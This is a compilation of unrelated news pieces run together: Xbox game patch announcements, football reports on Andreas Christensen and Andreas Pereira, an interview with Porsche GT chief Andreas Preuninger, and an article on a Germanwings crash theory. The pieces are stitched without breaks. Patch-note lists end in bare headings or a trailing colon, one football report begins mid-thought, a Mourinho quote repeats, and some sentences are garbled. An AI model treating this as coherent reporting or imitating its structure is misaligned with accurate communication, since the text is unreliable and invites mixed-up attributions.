This week saw another big PUBG update land on Xbox One, complete with Miramar upgrades. It wasn’t that long since Bluehole Inc and Microsoft released the new map on consoles. And now a new patch has been launched, aimed at improving the experience, among other things. The development team have confirmed that the Oasis in the northern area of the map has expanded, and should provide better encounters. It should also be noted that player reporting should now be enabled, giving Battle Royale fans the chance to report a team kill on Xbox One. Explaining the tweaks, a new message from the development team outlined some of the goals of the new patch. “Recently we shared a dev letter that gave a preview of some upcoming performance improvements we’ll be implementing in PUBG for Xbox One,” the development message reads. “We’ll need time to deliver on all of those improvements, but in the meantime we’ve got a small patch here with some bug fixes, improvements to Miramar, and a new teamkiller reporting function.” You can read about the other optimisations and tweaks made to PUBG on Xbox One, below: Optimisation Player reporting Miramar Bluezone A new State of Decay 2 update has been released today, a whopping 20GB patch which is available to download on Xbox One. This is an automatic update you will be prompted to install upon logging in, and it will not affect your saved game. Microsoft say this is just the first of a new wave of update, which will continue to bring additional content to State of Decay 2. Some of the most noticeable changes in this patch include stability, performance, and multiplayer improvements. Though as you can probably guess by the hefty 20GB download Microsoft have also included a huge amount of smaller quality of life fixes throughout the game. A message from Jeff Strain, Studio Head of Undead Labs, explains: “Hey fellow survivors, I just wanted to drop in a quick personal note on behalf of the development team to thank you for your support and for jumping in with us on State of Decay 2. “This patch today is just the beginning — we have big plans for State of Decay 2, and we’re humbled and appreciative to you for giving us the opportunity to make those big plans happen. Keep playing, keep surviving (or not, as sometimes happens), and stay tuned for more good stuff.” The 1.2 patch features significant improvements related to: Xbox One Backwards Compatibility is getting three blockbuster Xbox 360 releases. Rockstar announced plans to release three classics on Xbox One from June 7. The news was announced on the Rockstar Newswire: “A distinguished trio of Rockstar Xbox 360 titles are coming to the Xbox One Backward Compatibility catalog next week on Thursday, June 7. “The west coast GTA classic Grand Theft Auto: San Andreas, the breakneck high-speed racing Midnight Club: Los Angeles and the fast and fluid competition of Rockstar Games presents Table Tennis.” Anybody who downloaded the games in the Xbox 360 era will find them in the ‘My Games and Apps’ section of the Xbox One dashboard. If you own the retail editions of the games, you can install and play them by inserting the discs. You can even purchase the games directly from the Xbox Store. Rockstar Games Presents Table Tennis is currently available for £11.99, which is the same price as Grand Theft Auto San Andreas and Midnight Club Los Angeles. How he fared against more experienced opponents with just a few Premier League appearances to his name? How nervous he must have felt despite all that in-built bravado that took him all the way to one kick away from deciding a Champions League final? Now there is another youngster attempting the same journey, playing in the same position. Andreas Christensen hails from Lillerød in Denmark rather than Barking and may not appreciate any comparison with the Chelsea’s former leader, who just happened to be turning out at Preston for Aston Villa last night. But on the same path he most surely is. And already he has discovered how tough it is going to be. It was his error that gifted Lionel Messi his long-awaited first goal against Chelsea. The 21-year-old supplanted Gary Cahill for the visit of Lionel Messi and Luis Suarez in a team where the manager has already decided he can do with David Luiz, who was once the globe’s most costly defender. And like Terry and so few between he has come through the ranks at a club notorious for failing to promote young talent since Terry established himself as the ‘captain-leader-legend’ of the fans’ banners. But was Christensen nervous? You bet he was – and it showed. An early interception was clumsy but nothing on an attempted pass across his own box that went out for a corner. Yet nothing came of that and the young Dane grew into the game steadily. Last season he had been allowed a dress rehearsal, of sorts. Chelsea youngsters inevitably get loaned out, often to oblivion, but a two-season spell at Borussia Monchengladbach was a big indication that he was being earmarked for profitable use. Twice he played against Barcelona in the Champions League last season, a 2-1 loss at home and then a 4-0 mauling at the Nou Camp. That represented a steep learning curve but, again, how many Chelsea fans are aware of any grave errors committed in those games? This was the test that mattered against opponents Chelsea somehow managed to get past in the 2012 semi-final when Terry managed to get himself sent off before half-time. Christensen was in the right place to stop a foray forward by Suarez and did the same to repel Messi not long after, although nerves again got the better of him and possession was quickly surrendered. The half time whistle – and zero Barcelona goals – was proof of a job half done but well done by a player Frank Lampard had praised for being good enough to keep Vigil van Dijk out of the side had the Southampton man not chosen Liverpool over the champions last month. Indeed, speculation had been swirling around before that £75million deal was concluded that the Dane was on Barcelona own transfer radar. The second half began with a foot to halt Messi and a muscular shepherding of Suarez away from goal, although the Uruguayan’s trickery required Victor Moses’ arrival to complete the task. The hour mark came and went without a Barcelona goal and Willian’s fine strike at the other end quickly followed. Then came the moment he will be desperate to forget, the reckless ball across his own box meant for Cesc Fabregas but succeeding only in allowing Andres Iniesta to set up Messi for a needless equaliser. If JC is to become the new JT then he will have to recover from setbacks like this. Pereira spent last season on a season-long loan at Granada and impressed for the Spanish side despite their relegation. The Brazilian returned to Manchester United in the summer and was hopeful of pushing for a place in the first-team. But he was left out of the matchday squads in the opening weeks of the season and with the transfer deadline approaching pushed to leave. Pereira eventually returned to Spain but this time joined Valencia which left Mourinho irate. Mourinho said: “It was a personal decision that I don’t agree with, a decision I don’t think honestly is the best decision for him, a decision that disappoints me. “You have to be ready to fight for the position and I am disappointed he left. “But was his decision, I opened the door, he has a long-term contract, we have the option to bring him back on Jan. 1, so is not a drama but is a decision which disappoints me a little bit.” But Pereira insists he made the decision to leave for the benefit of his career. “That’s why it is difficult,” Pereira told The Guardian. “He told me I had to stay but I wanted to play and get more minutes. “He wanted me to stay there and it was important [to him], but I needed to do this. “This was important for me and my career. And I’m sure if it works out, next year I will be back there and it will be better for both of us. “In the end I think he is happy because he is a very honest coach. “I was talking to him right up to the very last minute when I came here.” Pereira joined Valencia on the final day of the Spanish transfer window in a bid to get more first-team experience. Mourinho had wanted the Brazilian midfielder to remain at the club for the season but the player opted to leave. And the United boss expressed his frustration with Pereira wanting to leave. Mourinho said: “It was a personal decision that I don’t agree with, a decision I don’t think honestly is the best decision for him, a decision that disappoints me. “He has the potential to be fighting for a position, opportunities and to be a Manchester United player. “His decision can be considered as a young player who wants to play every weekend but also a young player that is not ready to fight for something different and it’s different to play in Manchester United’s midfield. “You have to be ready to fight for the position and I am disappointed he left. But it was his decision. I open the door, he has a long-term contract. We have the option to bring him back on January 1, so is not a drama but it is a decision which disappoints me a little bit.”

As high-level automotive engineers and executives go, Porsche GT project director Andreas Preuninger is one of the most forthcoming and affable interviews around. Not content simply to give an answer, he’ll wander off script and let the pitch of his voice change to emphasize the good bits. Of course, coming from the guy responsible for the development of some of the most impressive and highly sought-after performance vehicles in the world, they’re almost all good bits. We caught up with him earlier this year, at the 2017 New York auto show.
–
Car and Driver: Your first car was a Volkswagen Scirocco, followed by other VWs that you modified. Do those experiences inform the decisions or processes you use today to develop Porsches?
–
Andreas Preuninger: Subconsciously, very much. At the age of 18, I had a Mark 1 [Volkswagen] Scirocco 1600 with a five-speed manual, and at that time [mine] was a quick car with an eight-second zero-to-60-mph time, and it was light and nimble with a sleek profile. I had this thing of getting the weight out, and I was always experimenting with wheels and tires and lowering, which served as my first experiences of how small changes can affect how a suspension and even aerodynamics work. Later, I moved on to the Mark 2 16-valve, but really it was kids’ games. When these cars could no longer feed my need for excitement, I moved on to a turbocharged four-wheel-drive [Lancia] Delta Integrale rally car, which had turbo lag like the Grand Canyon but was so much fun. But here is the point: It had an Alcantara interior, and this was at the end of the ’80s. I loved the Alcantara so much, it made me introduce it in the 996 GT3 RS for the first time a couple of decades later, because I remembered how good that felt, and it wasn’t [widely] introduced in the contemporary automotive realm. We did it on the steering wheel and expanded it to the whole cabin in the first-gen GT3.

C/D: So, the quest for power has been on an upward slope since then.
–
AP: In general, I always liked things that were a little bit overpowered, because this is what keeps a mechanical instrument challenging. It always has to have a little bit more power than you can handle, so it never gets boring. So naturally I was drawn to GT development at Porsche. The first-generation 996 GT3 was already in the works when I came on the team, but I was fascinated by this powerful, high-revving flat-six motor and kept developing it. The car you see today [the 2018 911 GT3 on the Porsche stand] is, I think, my 15th car, my 15th baby.
–
C/D: Speaking of high-revving engines, let’s talk about the changes to the valvetrain in the new GT3 4.0-liter. I understand it has been revised for simplicity.
–
AP: Yes. Because I believe in KISS [Keep It Simple, Stupid—although we could totally see Andreas rocking out to “Detroit Rock City”—Ed.] because then it lasts, it’s easy to maintain, it’s lightweight. The reason we decided to take away the hydraulic valve adjusters was to make the engine more efficient. [Previous hydraulic designs] call for a lot of oil pressure and volume to keep them operating, which means you have to drive the oil pump harder. By taking them out, you can lower the spring rate of the valve springs, which results in less friction and makes the camshaft easier to turn. That, in turn, means less internal resistance, which results in less energy needed to turn the crankshaft. And that frees another fraction of horsepower, about 5 to 8 horsepower gained by leaving things out in this case. It also means a lot less oil that needs to come through the motor in comparison to the Gen 1 4.0-liter; and the oiling system has been revised accordingly. It helps that the new oils we’ve developed with the oil industry are very stable.
–
C/D: I understand that the manual-transmission GT3 uses a dual-mass flywheel.
–
AP: Yes, a dual-mass flywheel on the manual transmission. We had it on the 911 R as well, but you could opt for a single-mass flywheel, which most everyone did. But in the new 4.0-liter we have a different crankshaft, and it is stiffer because the main bearings are larger in diameter, which increases rotational inertia. A single-mass flywheel will fit, but we found out it hurts the main bearings. And all the people working at shops who have the great idea to fit a single-mass flywheel to the car? Don’t. It will void the warranty. But the car doesn’t need it; it revs so explosively, the 4.0-liter is such a cracker of an engine, that it doesn’t miss it.
–
C/D: If you were putting your own money down, would you get a PDK (dual-clutch automatic) or a manual?
–
AP: That is a very good question. My attitude changes almost daily. I’m driving a dark gray PDK GT3 second-gen at the moment, and I have a Guards Red with manual as well. I’m really happy I don’t have to make this decision. I think track-oriented people should go PDK, but for the driver who really likes to think, be challenged, and wants to be an integral part of the drivetrain, the manual provides a very satisfying experience. Those who spend a lot of time in traffic will like the PDK, too. Even though the GT3 clutch is lighter, the PDK is easier in traffic.
–
–
C/D: The PDK is faster, too, right?
–
AP: Not as much as many people would think. The launch, definitely. But who is launching this car on a regular basis? It’s your driveshaft and tires. Do you want to replace them every other week? And if the car is in gear, and you are side by side with a PDK driver—I don’t just believe in numbers, I want to see it—rolling at, say, 20 mph and you’re good with a manual, which is 17 kilos [37 pounds] lighter, you won’t see that much of a lead from the PDK car until about 160 mph.
–
C/D: What do you think the take rate will be?
–
AP: We think it will be around 35/65 percent manual/PDK. But it’s hard to tell because currently only the PDK is on sale. We have many bets going inside the company. I don’t envy the people who have to make that calculation.
–
C/D: What’s the latest on the return of the GT2?
–
AP: Expect to hear from us this year.
–
C/D: Now that the 918 Spyder has set new standards for a hybrid vehicle, where do you go to top that?
–
AP: Personally, I’m an old-school guy, but I love the 918 Spyder. It has given me one of the most intense driving sensations since the Carrera GT. I love to speed between villages and then put it in E and whistle through the town with no one yelling at you. It’s as fierce as it can get. To top it, I don’t know, but that’s hypothetical, as we don’t currently have any new hypercar in development—that we are openly discussing. That said, would it make sense to do another hybrid? As Porsche, we need to be the leaders of any movement, and that is why we are doing the [Mission E] electric car. As a company, we have to do it [EV and hybrids], but maybe it doesn’t make sense to do it on a GT level. Not yet. If someone decides all motorsport would be all hybrid in the future, different story.
–
I take my hat off to the new Acura NSX; how they did it is very clever. But that is a sports car. A GT car is a very different thing.
–
–
C/D: Everyone wants to know—do you still have a Hemi-powered Ram pickup?
–
AP: I do, but it’s in the shop right now getting modified: a new bike rack for the top, new exhaust, new 22-inch SRT Viper wheels. And it’s lifted; I mean, you can’t get more attention in a town like Weissach, where every other car is a GT3 or a turbo, than with a big yellow truck. My wife loves it! She’s not into cars, but she loves it dearly because it’s so different.
–
C/D: Clearly your passion for performance is wide-ranging.
–
AP: I’m a freak for dirt bikes—I have a couple of KTMs—and I need the truck to transport them to tracks or deserted farmland. I watch these videos of guys dirt biking in America and people shooting [firearms], and, well, there are so many incentives to come to America.

On March 24 2015 Germanwings flight 9525 took off from Barcelona airport headed for Dusseldorf in Germany.
But the Airbus A320 never made it to its final destination.
Shortly after the plane reached its assigned cruising altitude, it suddenly began a rapid descent.
Moments later the doomed passenger jet crashed into the French Alps northwest of Nice, killing all 144 passengers and six crew members on board.
An investigation into the devastating event concluded that co-pilot Andreas Lubitz caused the crash in an apparent murder-suicide.
The then 27-year-old had a history of depression and suicidal tendencies, even declared “unfit for work” by a doctor.
But two years on, an armchair investigator has offered a shocking alternative theory to the cause of the air disaster.
Investigator Christine Negroni believes he might offer an alternative theory involving aerotoxicity – when on-board air becomes polluted by toxic fumes from engine oils.
Ms Negroni said: “I suspect they are going to suggest that Andreas was incapacitated by carbon monoxide ingestion and that he could not respond.”
The initial investigation cited a recording of Lubitz’ breathing in the flight’s final moments, to rule out this scenario.
But Ms Negroni refuted this claim, adding: “I was quite surprised the prosecutor in Marseille immediately said the pilot was breathing and therefore could not have been incapacitated.
“That’s an error because that means you’re not dead, you’re breathing. You’ve been incapacitated, overcome by toxicity in the air and therefore unable to respond.”
Despite the possibility of this alternative theory, Ms Negroni believes there are several flaws to consider.
“One is that he would have been the only one feeling the effects of it. This would have to have come on precisely at the moment the captain left the cockpit. The timing of it therefore makes it less likely.
“The fact that no one else seems to have experienced it makes it seem even less likely.”
As for what really happened then, this armchair investigator believes the clues lie in the events before the plane journey itself.
She said: “Take MH370 – there’s no evidence that emerged in that case that showed either one of those pilots were unstable, but in the case of the Germanwings it’s exactly the opposite. All sorts of evidence suggests he was not capable.
“There does seem to be strong reason to suggest investigators got it right in the case of Andreas. His documented psychological instability; the fact that he quit training for nine months to get treatment.”
Recent studies have shown that suicidal tendencies among pilots are disproportionately larger than the general population.
It’s for this exact reason that Ms Negroni argues more attention be paid to the mental health of pilots in order to prevent another Germanwings incident.
She said: “Authorities need to encourage their pilots to be frank and honest about their mental and physical illnesses because livelihoods are riding on it.”
